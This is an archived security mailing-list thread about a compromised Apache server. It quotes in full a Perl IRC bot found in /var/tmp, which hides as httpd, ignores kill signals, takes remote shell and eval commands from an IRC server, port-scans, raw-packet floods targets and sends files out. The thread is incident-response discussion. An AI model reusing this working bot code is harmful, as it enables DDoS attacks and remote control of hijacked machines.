Re: Apache hacks (./atac, d0s.txt)

From: Sagiko (sagiko_at_gmail.com)
Date: 04/30/05

  • Next message: Daniel Cid: "Re: Apache hacks (./atac, d0s.txt)"
    Date: Sat, 30 Apr 2005 15:17:42 +0800
    To: Andrew Y Ng <ayn@andrewng.com>
    
    

    hi,
    This looks like an typical irc bot written in perl and installed on
    the /tmp directory, (fyi http://www.honeynet.org/papers/bots/) if the
    system is not critical machine, it is advicable to take it down and do
    a full forensic checking. The typical hack proceedure is:

    exploit existing vulnerable application (such apache) --> get a
    non-privilege user --> install bot in /tmp or any world writeable and
    executable --> using local exploits to escalate the rights --> get
    superuser do whatever he wants (change binary, clean logs.. etc)

    Therefore in your case , you need to find out what's the stage of the
    compromise on your system and exactly which is the entry points (the
    vulnerabiliy exploited).

    regards,
    Rick
      

       

    On 4/30/05, Andrew Y Ng <ayn@andrewng.com> wrote:
    > My server has been seeing some usual activities today, I don't have much time
    > to get down to the bottom of things, but after I investigated briefly I have
    > decided to disable PERL executable permission for www-data (Apache process's
    > user), also locked /var/tmp so www-data cannot write to it.
    >
    > Looks like it ignores all the `kill` signals, not sure how I can actually
    > kill it...
    >
    > I found the included script in /var/tmp called d0s.txt.
    >
    > I found a bunch of processes called ./atac 20 running, and found the
    > following content in /tmp/atac:
    >
    > http://andrewng.com/tmp/atac.tbz
    >
    > here's d0s.txt:
    >
    > #!/usr/bin/perl
    > ################ CONFIGURACAO #################################################################
    > my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
    > #----------------------------------------------################################################
    > my $MODOME='+pi'; # Modo Do Bot #
    > #----------------------------------------------################################################
    > my $linas_max='10'; # Evita o flood :) depois de X linhas #
    > #----------------------------------------------################################################
    > my $sleep='3'; # ele dorme X segundos #
    > ##################### IRC #####################################################################
    > my @adms=("DDOS"); # Nick do administrador #
    > #----------------------------------------------################################################
    > my @canais=("#bots ddos");# Canais #
    > #----------------------------------------------################################################
    > my $nick='b0t'; # Nick do bot. Caso esteja em uso vai aparecer #
    > # # aparecer com numero radonamico no final #
    > #----------------------------------------------################################################
    > my $ircname = 'b0t'; # User ID #
    > #----------------------------------------------################################################
    > my $realname = '4Admin14: 4#DDOS'; #
    > #----------------------------------------------################################################
    > $servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado #
    > # # caso não seja especificado no argumento #
    > #----------------------------------------------################################################
    > my $porta='6667'; # Porta do servidor de irc #
    > ################ ACESSO A SHELL ###############################################################
    > my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    > ###############################################################################################
    >
    > my $VERSAO = '1.0';
    >
    > $SIG{'INT'} = 'IGNORE';
    > $SIG{'HUP'} = 'IGNORE';
    > $SIG{'TERM'} = 'IGNORE';
    > $SIG{'CHLD'} = 'IGNORE';
    > $SIG{'PS'} = 'IGNORE';
    >
    > use IO::Socket;
    > use Socket;
    > use IO::Select;
    > chdir("/");
    > $servidor="$ARGV[0]" if $ARGV[0];
    > $0="$processo"."\0"x16;;
    > my $pid=fork;
    > exit if $pid;
    > die "Problema com o fork: $!" unless defined($pid);
    >
    > our %irc_servers;
    > our %DCC;
    > my $dcc_sel = new IO::Select->new();
    >
    > $sel_cliente = IO::Select->new();
    > sub sendraw {
    > if ($#_ == '1') {
    > my $socket = $_[0];
    > print $socket "$_[1]\n";
    > } else {
    > print $IRC_cur_socket "$_[0]\n";
    > }
    > }
    >
    > sub conectar {
    > my $meunick = $_[0];
    > my $servidor_con = $_[1];
    > my $porta_con = $_[2];
    >
    > my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    > if (defined($IRC_socket)) {
    > $IRC_cur_socket = $IRC_socket;
    >
    > $IRC_socket->autoflush(1);
    > $sel_cliente->add($IRC_socket);
    >
    > $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    > $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    > $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    > $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    > nick("$meunick");
    > sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    > sleep 1;
    > }
    >
    > }
    > my $line_temp;
    > while( 1 ) {
    > while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    > delete($irc_servers{''}) if (defined($irc_servers{''}));
    > &DCC::connections;
    > my @ready = $sel_cliente->can_read(0);
    > next unless(@ready);
    > foreach $fh (@ready) {
    > $IRC_cur_socket = $fh;
    > $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    > $nread = sysread($fh, $msg, 4096);
    > if ($nread == 0) {
    > $sel_cliente->remove($fh);
    > $fh->close;
    > delete($irc_servers{$fh});
    > }
    > @lines = split (/\n/, $msg);
    >
    > for(my $c=0; $c<= $#lines; $c++) {
    > $line = $lines[$c];
    > $line=$line_temp.$line if ($line_temp);
    > $line_temp='';
    > $line =~ s/\r$//;
    > unless ($c == $#lines) {
    > parse("$line");
    > } else {
    > if ($#lines == 0) {
    > parse("$line");
    > } elsif ($lines[$c] =~ /\r$/) {
    > parse("$line");
    > } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    > parse("$line");
    > } else {
    > $line_temp = $line;
    > }
    > }
    > }
    > }
    > }
    >
    > sub parse {
    > my $servarg = shift;
    > if ($servarg =~ /^PING \:(.*)/) {
    > sendraw("PONG :$1");
    > } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    > my $pn=$1; my $onde = $4; my $args = $5;
    > if ($args =~ /^\001VERSION\001$/) {
    > notice("$pn", "\001Bot powered by DDOS TEAM\001");
    > }
    > if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    > if ($onde eq "$meunick"){
    > shell("$pn", "$args");
    > }
    > if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
    > my $natrix = $1;
    > my $arg = $2;
    > if ($arg =~ /^\!(.*)/) {
    > ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
    > } elsif ($arg =~ /^\@(.*)/) {
    > $ondep = $onde;
    > $ondep = $pn if $onde eq $meunick;
    > bfunc("$ondep","$1");
    > } else {
    > shell("$onde", "$arg");
    > }
    > }
    > }
    > } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    > if (lc($1) eq lc($meunick)) {
    > $meunick=$4;
    > $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    > }
    > } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    > nick("$meunick".int rand(9999));
    > } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    > $meunick = $2;
    > $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    > $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
    > foreach my $canal (@canais) {
    > print "$0 Executado \n";
    > sendraw("JOIN $canal");
    > sendraw("MODE $meunick $MODOME");
    > sendraw("PRIVMSG $canal :Modo Alterado Para4 $MODOME");
    > }
    > }
    > }
    >
    > sub bfunc {
    > my $printl = $_[0];
    > my $funcarg = $_[1];
    > if (my $pid = fork) {
    > waitpid($pid, 0);
    > } else {
    > if (fork) {
    > exit;
    > } else {
    > if ($funcarg =~ /^portscan (.*)/) {
    > my $hostip="$1";
    > my @portas=("21","22","23","25","53","80","110","143");
    > my (@aberta, %porta_banner);
    > foreach my $porta (@portas) {
    > my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    > if ($scansock) {
    > push (@aberta, $porta);
    > $scansock->close;
    > }
    > }
    >
    > if (@aberta) {
    > sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
    > } else {
    > sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
    > }
    > }
    > if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
    > my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
    > $dtime = 1 if $dtime == 0;
    > my %bytes;
    > $bytes{igmp} = $2 * $pacotes{igmp};
    > $bytes{icmp} = $2 * $pacotes{icmp};
    > $bytes{o} = $2 * $pacotes{o};
    > $bytes{udp} = $2 * $pacotes{udp};
    > $bytes{tcp} = $2 * $pacotes{tcp};
    >
    > sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
    > sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
    >
    > }
    > exit;
    > }
    > }
    > }
    >
    > sub ircase {
    > my ($kem, $printl, $case) = @_;
    >
    > if ($case =~ /^join (.*)/) {
    > j("$1");
    > }
    > if ($case =~ /^part (.*)/) {
    > p("$1");
    > }
    > if ($case =~ /^rejoin\s+(.*)/) {
    > my $chan = $1;
    > if ($chan =~ /^(\d+) (.*)/) {
    > for (my $ca = 1; $ca <= $1; $ca++ ) {
    > p("$2");
    > j("$2");
    > }
    > } else {
    > p("$chan");
    > j("$chan");
    > }
    > }
    > if ($case =~ /^op/) {
    > op("$printl", "$kem") if $case eq "op";
    > my $oarg = substr($case, 3);
    > op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    > }
    > if ($case =~ /^deop/) {
    > deop("$printl", "$kem") if $case eq "deop";
    > my $oarg = substr($case, 5);
    > deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    > }
    > if ($case =~ /^voice/) {
    > voice("$printl", "$kem") if $case eq "voice";
    > $oarg = substr($case, 6);
    > voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    > }
    > if ($case =~ /^devoice/) {
    > devoice("$printl", "$kem") if $case eq "devoice";
    > $oarg = substr($case, 8);
    > devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    > }
    > if ($case =~ /^msg\s+(\S+) (.*)/) {
    > msg("$1", "$2");
    > }
    > if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
    > for (my $cf = 1; $cf <= $1; $cf++) {
    > msg("$2", "$3");
    > }
    > }
    > if ($case =~ /^ctcp\s+(\S+) (.*)/) {
    > ctcp("$1", "$2");
    > }
    > if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
    > for (my $cf = 1; $cf <= $1; $cf++) {
    > ctcp("$2", "$3");
    > }
    > }
    > if ($case =~ /^invite\s+(\S+) (.*)/) {
    > invite("$1", "$2");
    > }
    > if ($case =~ /^nick (.*)/) {
    > nick("$1");
    > }
    > if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
    > conectar("$2", "$1", 6667);
    > }
    > if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
    > DCC::SEND("$1", "$2");
    > }
    > if ($case =~ /^raw (.*)/) {
    > sendraw("$1");
    > }
    > if ($case =~ /^eval (.*)/) {
    > eval "$1";
    > }
    > }
    > sub shell {
    > return unless $secv;
    > my $printl=$_[0];
    > my $comando=$_[1];
    > if ($comando =~ /cd (.*)/) {
    > chdir("$1") || msg("$printl", "Diertório inexistente!");
    > return;
    > }
    > elsif ($pid = fork) {
    > waitpid($pid, 0);
    > } else {
    > if (fork) {
    > exit;
    > } else {
    > my @resp=`$comando 2>&1 3>&1`;
    > my $c=0;
    > foreach my $linha (@resp) {
    > $c++;
    > chop $linha;
    > sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
    > if ($c == "$linas_max") {
    > $c=0;
    > sleep $sleep;
    > }
    > }
    > exit;
    > }
    > }
    > }
    >
    > #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
    > sub attacker {
    > my $iaddr = inet_aton($_[0]);
    > my $msg = 'B' x $_[1];
    > my $ftime = $_[2];
    > my $cp = 0;
    > my (%pacotes);
    > $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
    >
    > socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
    > socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    > socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    > socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    > return(undef) if $cp == 4;
    > my $itime = time;
    > my ($cur_time);
    > while ( 1 ) {
    > for (my $porta = 1; $porta <= 65000; $porta++) {
    > $cur_time = time - $itime;
    > last if $cur_time >= $ftime;
    > send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
    > send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
    > send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
    > send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
    >
    > # DoS ?? :P
    > for (my $pc = 3; $pc <= 255;$pc++) {
    > next if $pc == 6;
    > $cur_time = time - $itime;
    > last if $cur_time >= $ftime;
    > socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
    > send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
    > }
    > }
    > last if $cur_time >= $ftime;
    > }
    > return($cur_time, %pacotes);
    > }
    >
    > #############
    > # ALIASES #
    > #############
    >
    > sub action {
    > return unless $#_ == 1;
    > sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
    > }
    >
    > sub ctcp {
    > return unless $#_ == 1;
    > sendraw("PRIVMSG $_[0] :\001$_[1]\001");
    > }
    > sub msg {
    > return unless $#_ == 1;
    > sendraw("PRIVMSG $_[0] :$_[1]");
    > }
    >
    > sub notice {
    > return unless $#_ == 1;
    > sendraw("NOTICE $_[0] :$_[1]");
    > }
    >
    > sub op {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] +o $_[1]");
    > }
    > sub deop {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] -o $_[1]");
    > }
    > sub hop {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] +h $_[1]");
    > }
    > sub dehop {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] +h $_[1]");
    > }
    > sub voice {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] +v $_[1]");
    > }
    > sub devoice {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] -v $_[1]");
    > }
    > sub ban {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] +b $_[1]");
    > }
    > sub unban {
    > return unless $#_ == 1;
    > sendraw("MODE $_[0] -b $_[1]");
    > }
    > sub kick {
    > return unless $#_ == 1;
    > sendraw("KICK $_[0] $_[1] :$_[2]");
    > }
    >
    > sub modo {
    > return unless $#_ == 0;
    > sendraw("MODE $_[0] $_[1]");
    > }
    > sub mode { modo(@_); }
    >
    > sub j { &join(@_); }
    > sub join {
    > return unless $#_ == 0;
    > sendraw("JOIN $_[0]");
    > }
    > sub p { part(@_); }
    > sub part {sendraw("PART $_[0]");}
    >
    > sub nick {
    > return unless $#_ == 0;
    > sendraw("NICK $_[0]");
    > }
    >
    > sub invite {
    > return unless $#_ == 1;
    > sendraw("INVITE $_[1] $_[0]");
    > }
    > sub topico {
    > return unless $#_ == 1;
    > sendraw("TOPIC $_[0] $_[1]");
    > }
    > sub topic { topico(@_); }
    >
    > sub whois {
    > return unless $#_ == 0;
    > sendraw("WHOIS $_[0]");
    > }
    > sub who {
    > return unless $#_ == 0;
    > sendraw("WHO $_[0]");
    > }
    > sub names {
    > return unless $#_ == 0;
    > sendraw("NAMES $_[0]");
    > }
    > sub away {
    > sendraw("AWAY $_[0]");
    > }
    > sub back { away(); }
    > sub quit {
    > sendraw("QUIT :$_[0]");
    > }
    >
    > # DCC
    > package DCC;
    >
    > sub connections {
    > my @ready = $dcc_sel->can_read(1);
    > # return unless (@ready);
    > foreach my $fh (@ready) {
    > my $dcctipo = $DCC{$fh}{tipo};
    > my $arquivo = $DCC{$fh}{arquivo};
    > my $bytes = $DCC{$fh}{bytes};
    > my $cur_byte = $DCC{$fh}{curbyte};
    > my $nick = $DCC{$fh}{nick};
    >
    > my $msg;
    > my $nread = sysread($fh, $msg, 10240);
    >
    > if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
    > $DCC{$fh}{status} = "Cancelado";
    > $DCC{$fh}{ftime} = time;
    > $dcc_sel->remove($fh);
    > $fh->close;
    > next;
    > }
    >
    > if ($dcctipo eq "get") {
    > $DCC{$fh}{curbyte} += length($msg);
    >
    > my $cur_byte = $DCC{$fh}{curbyte};
    >
    > open(FILE, ">> $arquivo");
    > print FILE "$msg" if ($cur_byte <= $bytes);
    > close(FILE);
    >
    > my $packbyte = pack("N", $cur_byte);
    > print $fh "$packbyte";
    >
    > if ($bytes == $cur_byte) {
    > $dcc_sel->remove($fh);
    > $fh->close;
    > $DCC{$fh}{status} = "Recebido";
    > $DCC{$fh}{ftime} = time;
    > next;
    > }
    > } elsif ($dcctipo eq "send") {
    > my $send = $fh->accept;
    > $send->autoflush(1);
    > $dcc_sel->add($send);
    > $dcc_sel->remove($fh);
    > $DCC{$send}{tipo} = 'sendcon';
    > $DCC{$send}{itime} = time;
    > $DCC{$send}{nick} = $nick;
    > $DCC{$send}{bytes} = $bytes;
    > $DCC{$send}{curbyte} = 0;
    > $DCC{$send}{arquivo} = $arquivo;
    > $DCC{$send}{ip} = $send->peerhost;
    > $DCC{$send}{porta} = $send->peerport;
    > $DCC{$send}{status} = "Enviando";
    >
    > #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
    > open(FILE, "< $arquivo");
    > my $fbytes;
    > read(FILE, $fbytes, 1024);
    > print $send "$fbytes";
    > close FILE;
    > # delete($DCC{$fh});
    > } elsif ($dcctipo eq 'sendcon') {
    > my $bytes_sended = unpack("N", $msg);
    > $DCC{$fh}{curbyte} = $bytes_sended;
    > if ($bytes_sended == $bytes) {
    > $fh->close;
    > $dcc_sel->remove($fh);
    > $DCC{$fh}{status} = "Enviado";
    > $DCC{$fh}{ftime} = time;
    > next;
    > }
    > open(SENDFILE, "< $arquivo");
    > seek(SENDFILE, $bytes_sended, 0);
    > my $send_bytes;
    > read(SENDFILE, $send_bytes, 1024);
    > print $fh "$send_bytes";
    > close(SENDFILE);
    > }
    > }
    > }
    >
    > sub SEND {
    > my ($nick, $arquivo) = @_;
    > unless (-r "$arquivo") {
    > return(0);
    > }
    >
    > my $dccark = $arquivo;
    > $dccark =~ s/[.*\/](\S+)/$1/;
    >
    > my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
    > my $longip = unpack("N",inet_aton($meuip));
    >
    > my @filestat = stat($arquivo);
    > my $size_total=$filestat[7];
    > if ($size_total == 0) {
    > return(0);
    > }
    >
    > my ($porta, $sendsock);
    > do {
    > $porta = int rand(64511);
    > $porta += 1024;
    > $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
    > } until $sendsock;
    >
    > $DCC{$sendsock}{tipo} = 'send';
    > $DCC{$sendsock}{nick} = $nick;
    > $DCC{$sendsock}{bytes} = $size_total;
    > $DCC{$sendsock}{arquivo} = $arquivo;
    >
    > &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
    >
    > }
    >
    > sub GET {
    > my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
    > return(0) if (-e "$arquivo");
    > if (open(FILE, "> $arquivo")) {
    > close FILE;
    > } else {
    > return(0);
    > }
    >
    > my $dccip=fixaddr($dcclongip);
    > return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
    > my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
    > $dccsock->autoflush(1);
    > $dcc_sel->add($dccsock);
    > $DCC{$dccsock}{tipo} = 'get';
    > $DCC{$dccsock}{itime} = time;
    > $DCC{$dccsock}{nick} = $nick;
    > $DCC{$dccsock}{bytes} = $bytes;
    > $DCC{$dccsock}{curbyte} = 0;
    > $DCC{$dccsock}{arquivo} = $arquivo;
    > $DCC{$dccsock}{ip} = $dccip;
    > $DCC{$dccsock}{porta} = $dccporta;
    > $DCC{$dccsock}{status} = "Recebendo";
    > }
    >
    > # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
    > sub Status {
    > my $socket = shift;
    > my $sock_tipo = $DCC{$socket}{tipo};
    > unless (lc($sock_tipo) eq "chat") {
    > my $nick = $DCC{$socket}{nick};
    > my $arquivo = $DCC{$socket}{arquivo};
    > my $itime = $DCC{$socket}{itime};
    > my $ftime = time;
    > my $status = $DCC{$socket}{status};
    > $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
    >
    > my $d_time = $ftime-$itime;
    >
    > my $cur_byte = $DCC{$socket}{curbyte};
    > my $bytes_total = $DCC{$socket}{bytes};
    >
    > my $rate = 0;
    > $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
    > my $porcen = ($cur_byte*100)/$bytes_total;
    >
    > my ($r_duv, $p_duv);
    > if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
    > $r_duv = $3; $r_duv++ if $4 >= 5;
    > $rate = "$1\.$2"."$r_duv";
    > }
    > if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
    > $p_duv = $3; $p_duv++ if $4 >= 5;
    > $porcen = "$1\.$2"."$p_duv";
    > }
    > return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
    > }
    >
    > return(0);
    > }
    >
    > sub fixaddr {
    > my ($address) = @_;
    >
    > chomp $address; # just in case, sigh.
    > if ($address =~ /^\d+$/) {
    > return inet_ntoa(pack "N", $address);
    > } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
    > return $address;
    > } elsif ($address =~ tr/a-zA-Z//) {
    > return inet_ntoa(((gethostbyname($address))[4])[0]);
    > } else {
    > return;
    > }
    > }
    >
    > --
    > andrew y ng <ayn@andrewng.com> http://andrewng.com
    > principal, ayn & associates, llc, http://aynassociates.com
    >
    >
    >


  • Next message: Daniel Cid: "Re: Apache hacks (./atac, d0s.txt)"

    Relevant Pages

    • [tip:perf/scripting] perf trace: Add perf trace scripting support modules for Perl
      ... Add Perf-Trace-Util Perl module and some scripts that use it. ... new file mode 100644 ... +GNU General Public License version 2 as published by the Free ... +sub define_flag_field ...
      (Linux-Kernel)
    • RE: returning hashes, and arrays
      ... :> subroutine named link(). ... :> array interchangeably here. ... : 'Learning Perl'; ... : sub ParseLineForHomeAndVisitors; ...
      (perl.beginners)
    • Re: Shifting Away
      ... are there two armed camps of Perl monks throwing gazillion megawatt ... daily at shift change and shout "When should I use an en dash?" ... become a bit less paranoid now but it's hard to let go of formal params. ... in the argument list and the sub could still change that. ...
      (comp.lang.perl.misc)
    • [RFC][PATCH 4/7] perf trace: Add perf trace scripting support modules for Perl
      ... Add Perf-Trace-Util Perl module and some scripts that use it. ... new file mode 100644 ... +GNU General Public License version 2 as published by the Free ... +sub define_flag_field ...
      (Linux-Kernel)
    • Re: Hardware hackers rejoice!
      ... I've tried to warm up to Perl ... sub getvar { ... # Given 0, the fan is off. ... # Display to LCD ...
      (Ubuntu)